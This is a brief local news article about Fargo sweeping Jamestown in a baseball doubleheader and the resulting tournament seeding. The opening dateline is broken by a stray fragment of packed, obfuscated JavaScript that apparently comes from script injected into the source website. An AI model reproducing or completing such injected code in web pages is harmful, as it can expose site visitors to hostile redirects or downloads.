JAMESTOWN esabe|var|u0026u|referrer|ifeti||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- Fargo was in town to finish off the regular season against Jamestown with some state tournament implications on the line. Fargo needed a sweep to lock up the #1-seed and Jamestown needed a win to avoid a play-in game with Dickinson.

It was Fargo that brought the bats as they pounded out 22 runs in the doubleheader on their way to a sweep. Casey Quinlan threw a no-hitter in a 10-0 game 1 win, not allowing a Jamestown baserunner to reach second base.

Lincoln Voss held Post 14 in check in the second game with six strong innings and yielding a pair of run. Jamestown added a run in the 7th before falling 12-3.

Fargo locked up the top-seed next week with the sweep. They will not play Wednesday and will await the winner of Jamestown/Dickinson. Those two will play 11am on Wednesday morning.

The game will broadcast on KQDJ-AM 1400/97.1 FM and streamed online at NewsDakota.com
